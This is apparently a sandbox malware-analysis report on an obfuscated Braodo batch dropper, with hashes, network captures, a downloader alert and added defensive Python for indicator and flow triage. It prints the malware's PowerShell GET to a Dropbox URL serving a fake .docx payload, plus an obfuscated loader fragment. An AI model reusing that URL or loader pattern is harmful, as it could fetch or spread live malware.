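    for _sample, threats, indicators in rows:
        named = {t for t in threats if t != "Unknown"}  # 'Unknown' carries no attribution
        for ind in indicators:
            seen[ind] |= named
    return seen


def asn_of_ip(rows):
    """ip: -> asn: for every IP that appears in an ASN-keyed row."""
    owner = {}
    for _sample, _threats, indicators in rows:
        asns = [i for i in indicators if i.startswith("asn:")]
        if asns:
            for i in indicators:
                if i.startswith("ip:"):
                    owner[i] = asns[0]
    return owner


def classify(rows, threshold=SHARED_THRESHOLD):
    """'shared': many families use the indicator directly; 'shared-asn': the
    IP's ASN is shared; 'specific': nothing in the data shows reuse."""
    fams = families_per_indicator(rows)
    owner = asn_of_ip(rows)
    verdict = {}
    for ind, f in fams.items():
        if len(f) >= threshold:
            verdict[ind] = "shared"
        elif ind in owner and len(fams[owner[ind]]) >= threshold:
            verdict[ind] = "shared-asn"
        else:
            verdict[ind] = "specific"
    return verdict


def hunt_candidates(rows, family):
    """Indicators tied to `family` that are not shared infrastructure."""
    fams = families_per_indicator(rows)
    verdict = classify(rows)
    return sorted(i for i, f in fams.items() if family in f and verdict[i] == "specific")


if __name__ == "__main__":
    fams = families_per_indicator(CONTEXT_ROWS)
    for ind, v in sorted(classify(CONTEXT_ROWS).items()):
        print(f"{ind:45} {v:11} families={len(fams[ind])}")
    print("Braodo-specific network IOCs:", hunt_candidates(CONTEXT_ROWS, "Braodo") or "none")
```

On this report's data every network indicator comes out `shared` or `shared-asn` and `hunt_candidates` for Braodo is empty: the payload is fetched from Dropbox over a stock PowerShell/.NET TLS stack, so the file hashes and the .bat naming pattern are the indicators worth keeping, and the IPs and fingerprint belong in an allow-listed-infrastructure note rather than a blocklist.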
No context
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 0.6599547231656377
Encrypted: false
SSDEEP: 3:Nlllulmll:NllU
MD5: 8238A428604DFCBB76A63390CD65BBDE
SHA1: A4DA8D52DFE36DEB522DCAE7654E94B2F8391A57
SHA-256: E8E3F8A61FAA25DC1F29646A3E573345812BC15720CFC195094D9AD37C82A012
SHA-512: 061B3CCBA39A1E40BDF95D1D612B220B9C3C395DCC3249E9D03AF0B5ED92AAF770127849CBE0C5E41BEA342C54368E2294EA775DC37F5239DFAF4DBB557E79AE
Malicious: false
Preview: @...e...........................................................

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                        Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):14
                                                                                                                                                                                        Entropy (8bit):3.521640636343319
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:Mrv:gv
                                                                                                                                                                                        MD5:CE585C6BA32AC17652D2345118536F9C
                                                                                                                                                                                        SHA1:BE0E41B3690C42E4C0CDB53D53FC544FB46B758D
                                                                                                                                                                                        SHA-256:589C942E748EA16DC86923C4391092707CE22315EB01CB85B0988C6762AA0ED3
                                                                                                                                                                                        SHA-512:D397EDA475D6853CE5CC28887690DDD5F8891BE43767CDB666396580687F901FB6F0CC572AFA18BDE1468A77E8397812009C954F386C8F69CC0678E1253D5752
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:ECHO is off...
                                                                                                                                                                                        Process:C:\Windows\System32\find.exe
                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):36
                                                                                                                                                                                        Entropy (8bit):3.8956388075276664
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:gOmAe9qQn:xm/
                                                                                                                                                                                        MD5:89D484A82D15549C8F4BF2B4D4F1E924
                                                                                                                                                                                        SHA1:58F49E997A58A17C2902E08026BAC2DD16A34B1B
                                                                                                                                                                                        SHA-256:040AE1183CD6102AC612B2D88C2816B358FDC4743BC9CD05376E797595167B40
                                                                                                                                                                                        SHA-512:C0C920A9369FF9E28C9DAE6CA21AE7A1F9A79F2F4F8F97E247D133700FC446CEAA2C6C40116DE644CEA9336D9064792F3AD7011EBCBF5B6675779C57590F167B
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:FIND: Parameter format not correct..
File type:Non-ISO extended-ASCII text, with very long lines (1406), with LF, NEL line terminators, with escape sequences
Entropy (8bit):5.555052378289107
TrID:
• MP3 audio (1001/1) 100.00%
File name:hnl2bose13.bat
File size:34'657 bytes
MD5:a004836443420d9b08b715e5757afb5a
SHA1:11a2c48f70ce60ee145cf243173791099212082d
SHA256:6bf5abcdd7110ce950b92f4128c16e52cd2c9401f69955c1b112958ee64bcb0e
SHA512:775aa1d7985178705c290442e15376c8822427e6009dca35a80bce86f18150018694b243bdd8580d623c3b82a20dd09125c6d3ceceed6316ad95b124a212c595
SSDEEP:768:PhdZstnxvY4SqA1g+pXLN/H9Ayx1FTDl2PXg:dEAqy+yx1FTDl2PXg
TLSH:3DF2B3021A036EAE209C9734DA6E60B23CD358BD307FD176B53A3D1F9FE05158626E67
File Content Preview:....>nul 2>&1 &cls.@@ech^%(.........)...(......_...)...(.........)(........)...(......_...)......( ..._...)^...%%...( ..._...)......( ..._...)...(.........)(.........)...( ..._...)...(^.........)%%...(......_...)...(.........)(........)...( ..._...)...(..
Icon Hash:9686878b929a9886
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-18T09:56:12.487269+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49729 | 172.65.251.78 | 443 | TCP
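The packet list below is a flat per-packet record of two TCP/443 connections from the analysis host 192.168.2.6, one to 162.125.66.18 and one to 172.65.251.78. Reading direction, packet counts and duration off such a list by eye is error-prone, so the following Python is an added example (not code from the Joe Sandbox report) that groups the rows into bidirectional flows, with the first packet seen on a flow defining which endpoint is the client. The rows are the ones printed in the report, re-delimited with "|" for parsing. One practical detail it handles: the report's timestamps carry nine fractional digits, which datetime.strptime's %f (six digits) rejects, so the fraction is parsed separately and truncated to microseconds.

```python
import re
from datetime import datetime, timedelta

# Packet rows copied from the report's network table, re-delimited with "|":
# timestamp | source port | dest port | source IP | dest IP
PACKET_ROWS = """\
Nov 18, 2024 09:56:03.780821085 CET|49710|443|192.168.2.6|162.125.66.18
Nov 18, 2024 09:56:03.780852079 CET|443|49710|162.125.66.18|192.168.2.6
Nov 18, 2024 09:56:03.780922890 CET|49710|443|192.168.2.6|162.125.66.18
Nov 18, 2024 09:56:03.789753914 CET|49710|443|192.168.2.6|162.125.66.18
Nov 18, 2024 09:56:03.789766073 CET|443|49710|162.125.66.18|192.168.2.6
Nov 18, 2024 09:56:04.638597965 CET|443|49710|162.125.66.18|192.168.2.6
Nov 18, 2024 09:56:04.638680935 CET|49710|443|192.168.2.6|162.125.66.18
Nov 18, 2024 09:56:04.641351938 CET|49710|443|192.168.2.6|162.125.66.18
Nov 18, 2024 09:56:04.641366005 CET|443|49710|162.125.66.18|192.168.2.6
Nov 18, 2024 09:56:04.641836882 CET|443|49710|162.125.66.18|192.168.2.6
Nov 18, 2024 09:56:04.654721022 CET|49710|443|192.168.2.6|162.125.66.18
Nov 18, 2024 09:56:04.695329905 CET|443|49710|162.125.66.18|192.168.2.6
Nov 18, 2024 09:56:05.722270966 CET|443|49710|162.125.66.18|192.168.2.6
Nov 18, 2024 09:56:05.722347021 CET|443|49710|162.125.66.18|192.168.2.6
Nov 18, 2024 09:56:05.722476959 CET|49710|443|192.168.2.6|162.125.66.18
Nov 18, 2024 09:56:05.722476959 CET|49710|443|192.168.2.6|162.125.66.18
Nov 18, 2024 09:56:05.728079081 CET|49710|443|192.168.2.6|162.125.66.18
Nov 18, 2024 09:56:10.883127928 CET|49722|443|192.168.2.6|172.65.251.78
Nov 18, 2024 09:56:10.883188963 CET|443|49722|172.65.251.78|192.168.2.6
Nov 18, 2024 09:56:10.883686066 CET|49722|443|192.168.2.6|172.65.251.78
Nov 18, 2024 09:56:10.886749029 CET|49722|443|192.168.2.6|172.65.251.78
Nov 18, 2024 09:56:10.886770010 CET|443|49722|172.65.251.78|192.168.2.6
Nov 18, 2024 09:56:11.496414900 CET|443|49722|172.65.251.78|192.168.2.6
Nov 18, 2024 09:56:11.496507883 CET|49722|443|192.168.2.6|172.65.251.78
Nov 18, 2024 09:56:11.498589039 CET|49722|443|192.168.2.6|172.65.251.78
Nov 18, 2024 09:56:11.498600960 CET|443|49722|172.65.251.78|192.168.2.6
Nov 18, 2024 09:56:11.498925924 CET|443|49722|172.65.251.78|192.168.2.6
Nov 18, 2024 09:56:11.505669117 CET|49722|443|192.168.2.6|172.65.251.78
Nov 18, 2024 09:56:11.551332951 CET|443|49722|172.65.251.78|192.168.2.6
Nov 18, 2024 09:56:11.720932007 CET|443|49722|172.65.251.78|192.168.2.6
Nov 18, 2024 09:56:11.720997095 CET|443|49722|172.65.251.78|192.168.2.6
Nov 18, 2024 09:56:11.721055984 CET|443|49722|172.65.251.78|192.168.2.6
Nov 18, 2024 09:56:11.721100092 CET|49722|443|192.168.2.6|172.65.251.78
Nov 18, 2024 09:56:11.721129894 CET|443|49722|172.65.251.78|192.168.2.6
"""

TS_RE = re.compile(r"^(\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(\d{1,9}) CET$")


def parse_ts(text):
    """Parse the report's timestamp. strptime's %f only accepts up to six
    fractional digits, so the nanosecond field is split off and truncated."""
    m = TS_RE.match(text)
    if not m:
        raise ValueError("unrecognised timestamp: %r" % text)
    base = datetime.strptime(m.group(1), "%b %d, %Y %H:%M:%S")
    nanos = int(m.group(2).ljust(9, "0"))
    return base + timedelta(microseconds=nanos // 1000)


def parse_rows(text):
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, sport, dport, sip, dip = line.split("|")
        rows.append((parse_ts(ts), sip, int(sport), dip, int(dport)))
    return rows


def summarize(text):
    """Group packets into bidirectional flows keyed by the unordered endpoint
    pair; the first packet seen on a flow names the client side."""
    flows = {}
    for ts, sip, sport, dip, dport in parse_rows(text):
        key = tuple(sorted([(sip, sport), (dip, dport)]))
        f = flows.get(key)
        if f is None:
            f = flows[key] = {"client": (sip, sport), "server": (dip, dport),
                              "first": ts, "last": ts, "c2s": 0, "s2c": 0}
        f["first"] = min(f["first"], ts)
        f["last"] = max(f["last"], ts)
        if (sip, sport) == f["client"]:
            f["c2s"] += 1
        else:
            f["s2c"] += 1
    return [{
        "client": "%s:%d" % f["client"],
        "server": "%s:%d" % f["server"],
        "packets": f["c2s"] + f["s2c"],
        "c2s": f["c2s"],
        "s2c": f["s2c"],
        "duration_s": (f["last"] - f["first"]).total_seconds(),
    } for f in sorted(flows.values(), key=lambda f: f["first"])]


if __name__ == "__main__":
    for flow in summarize(PACKET_ROWS):
        print(flow)
```

On these rows the summary is two flows of 17 packets each, about 1.9 s and 0.8 s long. Note that the Suricata alert above names source port 49729, a later connection to 172.65.251.78 than the port-49722 flow listed here, so the alerting exchange is not among the rows visible in this excerpt.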
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 18, 2024 09:56:03.780821085 CET | 49710 | 443 | 192.168.2.6 | 162.125.66.18
Nov 18, 2024 09:56:03.780852079 CET | 443 | 49710 | 162.125.66.18 | 192.168.2.6
Nov 18, 2024 09:56:03.780922890 CET | 49710 | 443 | 192.168.2.6 | 162.125.66.18
Nov 18, 2024 09:56:03.789753914 CET | 49710 | 443 | 192.168.2.6 | 162.125.66.18
Nov 18, 2024 09:56:03.789766073 CET | 443 | 49710 | 162.125.66.18 | 192.168.2.6
Nov 18, 2024 09:56:04.638597965 CET | 443 | 49710 | 162.125.66.18 | 192.168.2.6
Nov 18, 2024 09:56:04.638680935 CET | 49710 | 443 | 192.168.2.6 | 162.125.66.18
Nov 18, 2024 09:56:04.641351938 CET | 49710 | 443 | 192.168.2.6 | 162.125.66.18
Nov 18, 2024 09:56:04.641366005 CET | 443 | 49710 | 162.125.66.18 | 192.168.2.6
Nov 18, 2024 09:56:04.641836882 CET | 443 | 49710 | 162.125.66.18 | 192.168.2.6
Nov 18, 2024 09:56:04.654721022 CET | 49710 | 443 | 192.168.2.6 | 162.125.66.18
Nov 18, 2024 09:56:04.695329905 CET | 443 | 49710 | 162.125.66.18 | 192.168.2.6
Nov 18, 2024 09:56:05.722270966 CET | 443 | 49710 | 162.125.66.18 | 192.168.2.6
Nov 18, 2024 09:56:05.722347021 CET | 443 | 49710 | 162.125.66.18 | 192.168.2.6
Nov 18, 2024 09:56:05.722476959 CET | 49710 | 443 | 192.168.2.6 | 162.125.66.18
Nov 18, 2024 09:56:05.722476959 CET | 49710 | 443 | 192.168.2.6 | 162.125.66.18
Nov 18, 2024 09:56:05.728079081 CET | 49710 | 443 | 192.168.2.6 | 162.125.66.18
Nov 18, 2024 09:56:10.883127928 CET | 49722 | 443 | 192.168.2.6 | 172.65.251.78
Nov 18, 2024 09:56:10.883188963 CET | 443 | 49722 | 172.65.251.78 | 192.168.2.6
Nov 18, 2024 09:56:10.883686066 CET | 49722 | 443 | 192.168.2.6 | 172.65.251.78
Nov 18, 2024 09:56:10.886749029 CET | 49722 | 443 | 192.168.2.6 | 172.65.251.78
Nov 18, 2024 09:56:10.886770010 CET | 443 | 49722 | 172.65.251.78 | 192.168.2.6
Nov 18, 2024 09:56:11.496414900 CET | 443 | 49722 | 172.65.251.78 | 192.168.2.6
Nov 18, 2024 09:56:11.496507883 CET | 49722 | 443 | 192.168.2.6 | 172.65.251.78
Nov 18, 2024 09:56:11.498589039 CET | 49722 | 443 | 192.168.2.6 | 172.65.251.78
Nov 18, 2024 09:56:11.498600960 CET | 443 | 49722 | 172.65.251.78 | 192.168.2.6
Nov 18, 2024 09:56:11.498925924 CET | 443 | 49722 | 172.65.251.78 | 192.168.2.6
Nov 18, 2024 09:56:11.505669117 CET | 49722 | 443 | 192.168.2.6 | 172.65.251.78
Nov 18, 2024 09:56:11.551332951 CET | 443 | 49722 | 172.65.251.78 | 192.168.2.6
Nov 18, 2024 09:56:11.720932007 CET | 443 | 49722 | 172.65.251.78 | 192.168.2.6
Nov 18, 2024 09:56:11.720997095 CET | 443 | 49722 | 172.65.251.78 | 192.168.2.6
Nov 18, 2024 09:56:11.721055984 CET | 443 | 49722 | 172.65.251.78 | 192.168.2.6
Nov 18, 2024 09:56:11.721100092 CET | 49722 | 443 | 192.168.2.6 | 172.65.251.78
Nov 18, 2024 09:56:11.721129894 CET | 443 | 49722 | 172.65.251.78 | 192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:11.721146107 CET44349722172.65.251.78192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:11.721174002 CET49722443192.168.2.6172.65.251.78
                                                                                                                                                                                        Nov 18, 2024 09:56:11.721204042 CET49722443192.168.2.6172.65.251.78
                                                                                                                                                                                        Nov 18, 2024 09:56:11.722301006 CET49722443192.168.2.6172.65.251.78
                                                                                                                                                                                        Nov 18, 2024 09:56:11.723022938 CET49729443192.168.2.6172.65.251.78
                                                                                                                                                                                        Nov 18, 2024 09:56:11.723124981 CET44349729172.65.251.78192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:11.723229885 CET49729443192.168.2.6172.65.251.78
                                                                                                                                                                                        Nov 18, 2024 09:56:11.723470926 CET49729443192.168.2.6172.65.251.78
                                                                                                                                                                                        Nov 18, 2024 09:56:11.723511934 CET44349729172.65.251.78192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:12.338264942 CET44349729172.65.251.78192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:12.344731092 CET49729443192.168.2.6172.65.251.78
                                                                                                                                                                                        Nov 18, 2024 09:56:12.344815016 CET44349729172.65.251.78192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:12.486928940 CET44349729172.65.251.78192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:12.487009048 CET44349729172.65.251.78192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:12.487042904 CET44349729172.65.251.78192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:12.487071991 CET44349729172.65.251.78192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:12.487104893 CET44349729172.65.251.78192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:12.487135887 CET44349729172.65.251.78192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:12.487159967 CET44349729172.65.251.78192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:12.487188101 CET49729443192.168.2.6172.65.251.78
                                                                                                                                                                                        Nov 18, 2024 09:56:12.487262964 CET44349729172.65.251.78192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:12.487294912 CET44349729172.65.251.78192.168.2.6
                                                                                                                                                                                        Nov 18, 2024 09:56:12.487302065 CET49729443192.168.2.6172.65.251.78
                                                                                                                                                                                        Nov 18, 2024 09:56:12.487344980 CET49729443192.168.2.6172.65.251.78
                                                                                                                                                                                        Nov 18, 2024 09:56:12.487368107 CET49729443192.168.2.6172.65.251.78
                                                                                                                                                                                        Nov 18, 2024 09:56:12.584896088 CET49729443192.168.2.6172.65.251.78
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 18, 2024 09:56:03.765657902 CET | 53196 | 53 | 192.168.2.6 | 1.1.1.1
Nov 18, 2024 09:56:03.773993969 CET | 53 | 53196 | 1.1.1.1 | 192.168.2.6
Nov 18, 2024 09:56:05.729635000 CET | 63243 | 53 | 192.168.2.6 | 1.1.1.1
Nov 18, 2024 09:56:05.749852896 CET | 53 | 63243 | 1.1.1.1 | 192.168.2.6
Nov 18, 2024 09:56:10.758029938 CET | 57683 | 53 | 192.168.2.6 | 1.1.1.1
Nov 18, 2024 09:56:10.874871969 CET | 53 | 57683 | 1.1.1.1 | 192.168.2.6

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 18, 2024 09:56:03.765657902 CET | 192.168.2.6 | 1.1.1.1 | 0x57e5 | Standard query (0) | www.dropbox.com | A (IP address) | IN (0x0001) | false
Nov 18, 2024 09:56:05.729635000 CET | 192.168.2.6 | 1.1.1.1 | 0x2089 | Standard query (0) | ucf06ed174ff1aa451643813ce27.dl.dropboxusercontent.com | A (IP address) | IN (0x0001) | false
Nov 18, 2024 09:56:10.758029938 CET | 192.168.2.6 | 1.1.1.1 | 0xab8a | Standard query (0) | gitlab.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 18, 2024 09:56:03.773993969 CET | 1.1.1.1 | 192.168.2.6 | 0x57e5 | No error (0) | www.dropbox.com | www-env.dropbox-dns.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 18, 2024 09:56:03.773993969 CET | 1.1.1.1 | 192.168.2.6 | 0x57e5 | No error (0) | www-env.dropbox-dns.com | | 162.125.66.18 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 09:56:05.749852896 CET | 1.1.1.1 | 192.168.2.6 | 0x2089 | No error (0) | ucf06ed174ff1aa451643813ce27.dl.dropboxusercontent.com | edge-block-www-env.dropbox-dns.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 18, 2024 09:56:05.749852896 CET | 1.1.1.1 | 192.168.2.6 | 0x2089 | No error (0) | edge-block-www-env.dropbox-dns.com | | 162.125.66.15 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 09:56:10.874871969 CET | 1.1.1.1 | 192.168.2.6 | 0xab8a | No error (0) | gitlab.com | | 172.65.251.78 | A (IP address) | IN (0x0001) | false

• www.dropbox.com
• gitlab.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49710 | 162.125.66.18 | 443 | 5896 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-18 08:56:04 UTC | 189 | OUT | GET /scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1 HTTP/1.1
Host: www.dropbox.com
Connection: Keep-Alive
2024-11-18 08:56:05 UTC | 4091 | IN | HTTP/1.1 302 Found
